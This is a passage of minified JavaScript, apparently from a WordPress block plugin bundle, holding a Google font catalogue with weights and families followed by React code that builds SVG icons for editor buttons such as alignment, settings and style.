Tech",v:[400],f:"sans-serif"},{n:"Share Tech Mono",v:[400],f:"monospace"},{n:"Shippori Antique",v:[400],f:"sans-serif"},{n:"Shippori Antique B1",v:[400],f:"sans-serif"},{n:"Shippori Mincho",v:[400,500,600,700,800],f:"serif"},{n:"Shippori Mincho B1",v:[400,500,600,700,800],f:"serif"},{n:"Shojumaru",v:[400],f:"display"},{n:"Short Stack",v:[400],f:"handwriting"},{n:"Shrikhand",v:[400],f:"display"},{n:"Siemreap",v:[400],f:"display"},{n:"Sigmar One",v:[400],f:"display"},{n:"Signika",v:["300",400,500,600,700],f:"sans-serif"},{n:"Signika Negative",v:["300",400,500,600,700],f:"sans-serif"},{n:"Simonetta",v:[400,"400i",900,"900i"],f:"display"},{n:"Single Day",v:[400],f:"display"},{n:"Sintony",v:[400,700],f:"sans-serif"},{n:"Sirin Stencil",v:[400],f:"display"},{n:"Six Caps",v:[400],f:"sans-serif"},{n:"Skranji",v:[400,700],f:"display"},{n:"Slabo 13px",v:[400],f:"serif"},{n:"Slabo 27px",v:[400],f:"serif"},{n:"Slackey",v:[400],f:"display"},{n:"Smokum",v:[400],f:"display"},{n:"Smooch",v:[400],f:"handwriting"},{n:"Smooch Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Smythe",v:[400],f:"display"},{n:"Sniglet",v:[400,800],f:"display"},{n:"Snippet",v:[400],f:"sans-serif"},{n:"Snowburst One",v:[400],f:"display"},{n:"Sofadi One",v:[400],f:"display"},{n:"Sofia",v:[400],f:"handwriting"},{n:"Solway",v:["300",400,500,700,800],f:"serif"},{n:"Song Myung",v:[400],f:"serif"},{n:"Sonsie One",v:[400],f:"display"},{n:"Sora",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Sorts Mill Goudy",v:[400,"400i"],f:"serif"},{n:"Source Code Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Source Sans 3",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Source Sans Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Source Serif 4",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Source Serif Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"serif"},{n:"Space Grotesk",v:["300",400,500,600,700],f:"sans-serif"},{n:"Space Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Special Elite",v:[400],f:"display"},{n:"Spectral",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spectral SC",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spicy Rice",v:[400],f:"display"},{n:"Spinnaker",v:[400],f:"sans-serif"},{n:"Spirax",v:[400],f:"display"},{n:"Spline Sans",v:["300",400,500,600,700],f:"sans-serif"},{n:"Squada One",v:[400],f:"display"},{n:"Square Peg",v:[400],f:"handwriting"},{n:"Sree Krushnadevaraya",v:[400],f:"serif"},{n:"Sriracha",v:[400],f:"handwriting"},{n:"Srisakdi",v:[400,700],f:"display"},{n:"Staatliches",v:[400],f:"display"},{n:"Stalemate",v:[400],f:"handwriting"},{n:"Stalinist One",v:[400],f:"display"},{n:"Stardos Stencil",v:[400,700],f:"display"},{n:"Stick",v:[400],f:"sans-serif"},{n:"Stick No Bills",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Stint Ultra Condensed",v:[400],f:"display"},{n:"Stint Ultra Expanded",v:[400],f:"display"},{n:"Stoke",v:["300",400],f:"serif"},{n:"Strait",v:[400],f:"sans-serif"},{n:"Style Script",v:[400],f:"handwriting"},{n:"Stylish",v:[400],f:"sans-serif"},{n:"Sue Ellen Francisco",v:[400],f:"handwriting"},{n:"Suez One",v:[400],f:"serif"},{n:"Sulphur Point",v:["300",400,700],f:"sans-serif"},{n:"Sumana",v:[400,700],f:"serif"},{n:"Sunflower",v:["300",500,700],f:"sans-serif"},{n:"Sunshiney",v:[400],f:"handwriting"},{n:"Supermercado One",v:[400],f:"display"},{n:"Sura",v:[400,700],f:"serif"},{n:"Suranna",v:[400],f:"serif"},{n:"Suravaram",v:[400],f:"serif"},{n:"Suwannaphum",v:["100","300",400,700,900],f:"serif"},{n:"Swanky and Moo Moo",v:[400],f:"handwriting"},{n:"Syncopate",v:[400,700],f:"sans-serif"},{n:"Syne",v:[400,500,600,700,800],f:"sans-serif"},{n:"Syne Mono",v:[400],f:"monospace"},{n:"Syne Tactile",v:[400],f:"display"},{n:"Schibsted Grotesk",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Shantell Sans",v:[300,400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"display"},{n:"Sigmar",v:[400],f:"display"},{n:"Silkscreen",v:[400,700],f:"display"},{n:"Slackside One",v:[400],f:"handwriting"},{n:"Sofia Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Extra Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Semi Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Solitreo",v:[400],f:"handwriting"},{n:"Sono",v:[200,300,400,500,600,700,800],f:"sans-serif"},{n:"Splash",v:[400],f:"handwriting"},{n:"Spline Sans Mono",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Tajawal",v:["200","300",400,500,700,800,900],f:"sans-serif"},{n:"Tangerine",v:[400,700],f:"handwriting"},{n:"Tapestry",v:[400],f:"handwriting"},{n:"Taprom",v:[400],f:"display"},{n:"Tauri",v:[400],f:"sans-serif"},{n:"Taviraj",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Teko",v:["300",400,500,600,700],f:"sans-serif"},{n:"Telex",v:[400],f:"sans-serif"},{n:"Tenali Ramakrishna",v:[400],f:"sans-serif"},{n:"Tenor Sans",v:[400],f:"sans-serif"},{n:"Text Me One",v:[400],f:"sans-serif"},{n:"Texturina",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Thasadith",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"The Girl Next Door",v:[400],f:"handwriting"},{n:"The Nautigal",v:[400,700],f:"handwriting"},{n:"Tienne",v:[400,700,900],f:"serif"},{n:"Tillana",v:[400,500,600,700,800],f:"handwriting"},{n:"Timmana",v:[400],f:"sans-serif"},{n:"Tinos",v:[400,"400i",700,"700i"],f:"serif"},{n:"Titan One",v:[400],f:"display"},{n:"Titillium Web",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900],f:"sans-serif"},{n:"Tomorrow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Tourney",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Trade Winds",v:[400],f:"display"},{n:"Train One",v:[400],f:"display"},{n:"Trirong",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Trispace",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Trocchi",v:[400],f:"serif"},{n:"Trochut",v:[400,"400i",700],f:"display"},{n:"Truculenta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Trykker",v:[400],f:"serif"},{n:"Tulpen One",v:[400],f:"display"},{n:"Turret Road",v:["200","300",400,500,700,800],f:"display"},{n:"Twinkle Star",v:[400],f:"handwriting"},{n:"Tai Heritage Pro",v:[400,700],f:"serif"},{n:"Tilt Neon",v:[400],f:"display"},{n:"Tilt Prism",v:[400],f:"display"},{n:"Tilt Warp",v:[400],f:"display"},{n:"Tiro Bangla",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Hindi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Marathi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Sanskrit",v:[400,"400i"],f:"serif"},{n:"Tiro Gurmukhi",v:[400,"400i"],f:"serif"},{n:"Tiro Kannada",v:[400,"400i"],f:"serif"},{n:"Tiro Tamil",v:[400,"400i"],f:"serif"},{n:"Tiro Telugu",v:[400,"400i"],f:"serif"},{n:"Tsukimi Rounded",v:[300,400,500,600,700],f:"sans-serif"},{n:"Ubuntu",v:["300","300i",400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Ubuntu Condensed",v:[400],f:"sans-serif"},{n:"Ubuntu Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Uchen",v:[400],f:"serif"},{n:"Ultra",v:[400],f:"serif"},{n:"Uncial Antiqua",v:[400],f:"display"},{n:"Underdog",v:[400],f:"display"},{n:"Unica One",v:[400],f:"display"},{n:"UnifrakturCook",v:[700],f:"display"},{n:"UnifrakturMaguntia",v:[400],f:"display"},{n:"Unkempt",v:[400,700],f:"display"},{n:"Unlock",v:[400],f:"display"},{n:"Unna",v:[400,"400i",700,"700i"],f:"serif"},{n:"Updock",v:[400],f:"handwriting"},{n:"Urbanist",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Unbounded",v:[200,300,400,500,600,700,800,900],f:"display"},{n:"VT323",v:[400],f:"monospace"},{n:"Vampiro One",v:[400],f:"display"},{n:"Varela",v:[400],f:"sans-serif"},{n:"Varela Round",v:[400],f:"sans-serif"},{n:"Varta",v:["300",400,500,600,700],f:"sans-serif"},{n:"Vast Shadow",v:[400],f:"display"},{n:"Vazirmatn",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Vesper Libre",v:[400,500,700,900],f:"serif"},{n:"Viaoda Libre",v:[400],f:"display"},{n:"Vibes",v:[400],f:"display"},{n:"Vibur",v:[400],f:"handwriting"},{n:"Vidaloka",v:[400],f:"serif"},{n:"Viga",v:[400],f:"sans-serif"},{n:"Voces",v:[400],f:"display"},{n:"Volkhov",v:[400,"400i",700,"700i"],f:"serif"},{n:"Vollkorn",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Vollkorn SC",v:[400,600,700,900],f:"serif"},{n:"Voltaire",v:[400],f:"sans-serif"},{n:"Vujahday Script",v:[400],f:"handwriting"},{n:"Vina Sans",v:[400],f:"display"},{n:"Waiting for the Sunrise",v:[400],f:"handwriting"},{n:"Wallpoet",v:[400],f:"display"},{n:"Walter Turncoat",v:[400],f:"handwriting"},{n:"Warnes",v:[400],f:"display"},{n:"Water Brush",v:[400],f:"handwriting"},{n:"Waterfall",v:[400],f:"handwriting"},{n:"Wellfleet",v:[400],f:"display"},{n:"Wendy One",v:[400],f:"sans-serif"},{n:"Whisper",v:[400],f:"handwriting"},{n:"WindSong",v:[400,500],f:"handwriting"},{n:"Wire One",v:[400],f:"sans-serif"},{n:"Work Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Wix Madefor Display",v:[400,500,600,700,800],f:"sans-serif"},{n:"Wix Madefor Text",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Xanh Mono",v:[400,"400i"],f:"monospace"},{n:"Yaldevi",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yanone Kaffeesatz",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yantramanav",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Yatra One",v:[400],f:"display"},{n:"Yellowtail",v:[400],f:"handwriting"},{n:"Yeon Sung",v:[400],f:"display"},{n:"Yeseva One",v:[400],f:"display"},{n:"Yesteryear",v:[400],f:"handwriting"},{n:"Yomogi",v:[400],f:"handwriting"},{n:"Yrsa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Yuji Boku",v:[400],f:"serif"},{n:"Yuji Mai",v:[400],f:"serif"},{n:"Yuji Syuku",v:[400],f:"serif"},{n:"Yusei Magic",v:[400],f:"sans-serif"},{n:"Ysabeau",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"ZCOOL KuaiLe",v:[400],f:"sans-serif"},{n:"ZCOOL QingKe HuangYou",v:[400],f:"sans-serif"},{n:"ZCOOL XiaoWei",v:[400],f:"sans-serif"},{n:"Zen Antique",v:[400],f:"serif"},{n:"Zen Antique Soft",v:[400],f:"serif"},{n:"Zen Dots",v:[400],f:"display"},{n:"Zen Kaku Gothic Antique",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kaku Gothic New",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kurenaido",v:[400],f:"sans-serif"},{n:"Zen Loop",v:[400,"400i"],f:"display"},{n:"Zen Maru Gothic",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Old Mincho",v:[400,500,600,700,900],f:"serif"},{n:"Zen Tokyo Zoo",v:[400],f:"display"},{n:"Zeyada",v:[400],f:"handwriting"},{n:"Zhi Mang Xing",v:[400],f:"handwriting"},{n:"Zilla Slab",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Zilla Slab Highlight",v:[400,700],f:"display"}]},7763:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.left=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 19.8h8.9v-1.5H4v1.5zm8.9-15.6H4v1.5h8.9V4.2zm-8.9 7v1.5h16v-1.5H4z"})),r.center=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.4 4.2H7.6v1.5h8.9V4.2zM4 11.2v1.5h16v-1.5H4zm3.6 8.6h8.9v-1.5H7.6v1.5z"})),r.right=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.1 19.8H20v-1.5h-8.9v1.5zm0-15.6v1.5H20V4.2h-8.9zM4 12.8h16v-1.5H4v1.5z"})),r.spacing=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:24,height:24,fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"#1E1E1E",strokeWidth:"1.5",d:"m10 8-3.3 3.3a1 1 0 0 0 0 1.4L10 16m4-8 3.3 3.3a1 1 0 0 1 0 1.4L14 16m-7.59-4H17.6M20 4v16M4 4v16"})),r.updateLink=(0,a.createElement)("svg",{style:{height:"20px",width:"20px"},xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M12.95 2.93a5.75 5.75 0 0 1 8.13 8.13v.01l-3 3a5.75 5.75 0 0 1-8.68-.62.75.75 0 0 1 1.2-.9 4.25 4.25 0 0 0 6.41.46l3-3a4.25 4.25 0 0 0-6.02-6l-1.71 1.7a.75.75 0 1 1-1.06-1.06l1.73-1.72Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M7.99 8.6a5.75 5.75 0 0 1 6.61 1.95.75.75 0 1 1-1.2.9 4.25 4.25 0 0 0-6.41-.46l-3 3a4.25 4.25 0 0 0 6.01 6l1.71-1.7a.75.75 0 0 1 1.06 1.06l-1.72 1.72a5.75 5.75 0 0 1-8.13-8.13l.01-.01 3-3a5.75 5.75 0 0 1 2.06-1.32Z",clipRule:"evenodd"})),r.addSubmenu=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"16",height:"16",fill:"none",viewBox:"0 0 16 16"},(0,a.createElement)("g",{fill:"#070707",fillRule:"evenodd",clipPath:"url(#a)",clipRule:"evenodd"},(0,a.createElement)("path",{d:"M.17 2C.17.99.99.17 2 .17h12c1.01 0 1.83.82 1.83 1.83v1.33c0 1.02-.82 1.84-1.83 1.84H2A1.83 1.83 0 0 1 .17 3.33V2ZM2 1.17a.83.83 0 0 0-.83.83v1.33c0 .46.37.84.83.84h12c.46 0 .83-.38.83-.84V2a.83.83 0 0 0-.83-.83H2ZM5.5 8c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83v.67c0 1-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 8.67V8Zm1.83-.83A.83.83 0 0 0 6.5 8v.67c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83V8a.83.83 0 0 0-.83-.83H7.33ZM5.5 13.33c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83V14c0 1.01-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 14v-.67Zm1.83-.83a.83.83 0 0 0-.83.83V14c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83v-.67a.83.83 0 0 0-.83-.83H7.33Z"}),(0,a.createElement)("path",{d:"M2.17 13V4.67h1V13c0 .1.07.17.16.17H6.5v1H3.33c-.64 0-1.16-.53-1.16-1.17Z"}),(0,a.createElement)("path",{d:"M2.17 7.83H6.5v1H2.17v-1Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"a"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h16v16H0z"})))),r.textTab=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18V6C4 4.89543 4.89543 4 6 4H14.8639C15.3943 4 15.903 4.21071 16.2781 4.58579L19.4142 7.72191C19.7893 8.09698 20 8.60569 20 9.13612V18C20 19.1046 19.1046 20 18 20H6C4.89543 20 4 19.1046 4 18Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 15H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 12H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 9H14",stroke:"#1E1E1E",strokeWidth:"1.5"})),(0,a.createElement)("span",null,"Text")),r.style=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),(0,a.createElement)("span",null,"Style")),r.settings3=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.0733 7.98829L19.5027 6.9982C19.02 6.16044 17.9503 5.87144 17.1114 6.35213C16.7121 6.58737 16.2356 6.65411 15.787 6.53764C15.3384 6.42116 14.9546 6.13103 14.7201 5.73123C14.5693 5.47711 14.4882 5.18767 14.4852 4.89218C14.4988 4.41843 14.3201 3.95934 13.9897 3.61951C13.6593 3.27967 13.2055 3.08802 12.7316 3.08821H11.5821C11.1177 3.08821 10.6725 3.27323 10.345 3.60234C10.0175 3.93145 9.83459 4.37752 9.83682 4.84183C9.82306 5.80049 9.04195 6.57039 8.08319 6.57029C7.7877 6.56722 7.49826 6.48617 7.24414 6.33535C6.40523 5.85465 5.33553 6.14366 4.85284 6.98142L4.24033 7.98829C3.75822 8.825 4.04329 9.89403 4.87801 10.3796C5.42059 10.6928 5.75483 11.2718 5.75483 11.8983C5.75483 12.5248 5.42059 13.1037 4.87801 13.417C4.04435 13.8993 3.75897 14.9657 4.24033 15.7999L4.81927 16.7984C5.04543 17.2064 5.42489 17.5076 5.87369 17.6351C6.32248 17.7627 6.8036 17.7061 7.21058 17.478C7.61067 17.2445 8.08743 17.1806 8.5349 17.3003C8.98238 17.4201 9.36347 17.7136 9.59349 18.1157C9.74431 18.3698 9.82536 18.6592 9.82843 18.9547C9.82843 19.9232 10.6136 20.7083 11.5821 20.7083H12.7316C13.6968 20.7083 14.4806 19.9283 14.4852 18.9631C14.4829 18.4973 14.667 18.05 14.9963 17.7206C15.3257 17.3913 15.773 17.2073 16.2388 17.2095C16.5336 17.2174 16.8218 17.2981 17.0779 17.4444C17.9146 17.9265 18.9836 17.6415 19.4692 16.8067L20.0733 15.7999C20.3071 15.3985 20.3713 14.9205 20.2516 14.4717C20.1319 14.0228 19.8382 13.6402 19.4356 13.4086C19.033 13.1769 18.7393 12.7943 18.6196 12.3455C18.4999 11.8967 18.5641 11.4186 18.7979 11.0173C18.95 10.7518 19.1701 10.5317 19.4356 10.3796C20.2653 9.89429 20.5497 8.83151 20.0733 7.99668V7.98829Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.1606 14.3147C13.4952 14.3147 14.5771 13.2329 14.5771 11.8983C14.5771 10.5637 13.4952 9.4818 12.1606 9.4818C10.826 9.4818 9.74414 10.5637 9.74414 11.8983C9.74414 13.2329 10.826 14.3147 12.1606 14.3147Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,a.createElement)("span",null,"Settings")),r.add=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:22,height:24,viewBox:"0 0 22 24",fill:"none"},(0,a.createElement)("g",{clipPath:"url(#clip0_16_9344)"},(0,a.createElement)("path",{d:"M15.7131 0.87241C16.6876 0.87241 17.4896 1.67503 17.4896 2.66957V17.6401C17.4896 18.626 16.6962 19.4373 15.7131 19.4373H2.63896C1.66445 19.4373 0.862407 18.6347 0.862407 17.6401V2.66957C0.862407 1.68375 1.65582 0.87241 2.63896 0.87241H15.7131ZM15.7131 0H2.63896C1.1815 0 0 1.1952 0 2.66957V17.6401C0 19.1145 1.1815 20.3097 2.63896 20.3097H15.7131C17.1705 20.3097 18.352 19.1145 18.352 17.6401V2.66957C18.352 1.1952 17.1705 0 15.7131 0Z",fill:"black"}),(0,a.createElement)("path",{d:"M19.2921 10.2683H11.1337C9.63817 10.2683 8.42578 11.4948 8.42578 13.0077V21.2607C8.42578 22.7736 9.63817 24 11.1337 24H19.2921C20.7877 24 22.0001 22.7736 22.0001 21.2607V13.0077C22.0001 11.4948 20.7877 10.2683 19.2921 10.2683Z",fill:"black"}),(0,a.createElement)("path",{d:"M15.7047 13.9934H14.7129V20.2835H15.7047V13.9934Z",fill:"white"}),(0,a.createElement)("path",{d:"M18.3264 16.6282H12.1084V17.6314H18.3264V16.6282Z",fill:"white"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"clip0_16_9344"},(0,a.createElement)("rect",{width:22,height:24,fill:"white"})))),r.setting=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",role:"img","aria-hidden":"true",focusable:"false"},(0,a.createElement)("path",{d:"M14.5 13.8c-1.1 0-2.1.7-2.4 1.8H4V17h8.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20v-1.5h-3.1c-.3-1-1.3-1.7-2.4-1.7zM11.9 7c-.3-1-1.3-1.8-2.4-1.8S7.4 6 7.1 7H4v1.5h3.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20V7h-8.1z"})),r.styleIcon=(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",style:{fill:"white"}},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),r.chatgpt=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",style:{fill:"#10a37f"},width:"25",height:"25.06",viewBox:"0 0 25 25.06"},(0,a.createElement)("path",{"data-name":"Path 146",d:"M24.795 12.941a6.153 6.153 0 0 0-1.519-2.7A6.07 6.07 0 0 0 22.8 5.1a6.327 6.327 0 0 0-6.88-2.917A6.28 6.28 0 0 0 5.139 4.471 6.223 6.223 0 0 0 .846 7.45a6.137 6.137 0 0 0 .862 7.358 6.07 6.07 0 0 0 .479 5.138 6.281 6.281 0 0 0 6.88 2.91A6.278 6.278 0 0 0 19.851 20.6a6.23 6.23 0 0 0 4.293-2.979 6.092 6.092 0 0 0 .651-4.682m-4.888 5.947v-6.22a.639.639 0 0 0-.285-.621L13.913 8.82l2.061-1.17L20.8 10.4a4.636 4.636 0 0 1 2.209 2.854 4.566 4.566 0 0 1-.475 3.517 4.662 4.662 0 0 1-2.185 1.943c-.146.063-.3.122-.446.178M5.083 6.178v6.2a.624.624 0 0 0 .279.622l5.708 3.226L9.011 17.4l-4.852-2.752a4.639 4.639 0 0 1-2.21-2.854 4.562 4.562 0 0 1 .473-3.514 4.687 4.687 0 0 1 1.784-1.736 4.551 4.551 0 0 1 .877-.367m11.268.023a.714.714 0 0 0-.707 0L9.855 9.5V7.1l4.92-2.748a4.79 4.79 0 0 1 6.485 1.721 4.574 4.574 0 0 1 .616 2.648c-.014.19-.039.393-.07.58zm-3.859 3.47 2.637 1.5v2.756l-2.637 1.457-2.631-1.5v-2.741zM8.8 6.067a.684.684 0 0 0-.3.624v6.4l-2.082-1.137V6.587a1.017 1.017 0 0 0 0-.112 4.75 4.75 0 0 1 7.364-3.911 6.33 6.33 0 0 1 .547.412zm-5.614 9.692 5.448 3.1a.713.713 0 0 0 .707 0l5.8-3.294v2.4l-4.927 2.729a4.79 4.79 0 0 1-6.485-1.713 4.573 4.573 0 0 1-.588-2.917c.013-.1.031-.2.05-.3m13 3.226a.647.647 0 0 0 .3-.627v-6.4l2.07 1.137v5.367a.637.637 0 0 0 0 .112 4.75 4.75 0 0 1-7.441 3.851 7.315 7.315 0 0 1-.467-.356z",transform:"translate(0 .001)"})),r.fs_comment=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50",height:"50.003",viewBox:"0 0 50 50.003"},(0,a.createElement)("path",{id:"Path_2150","data-name":"Path 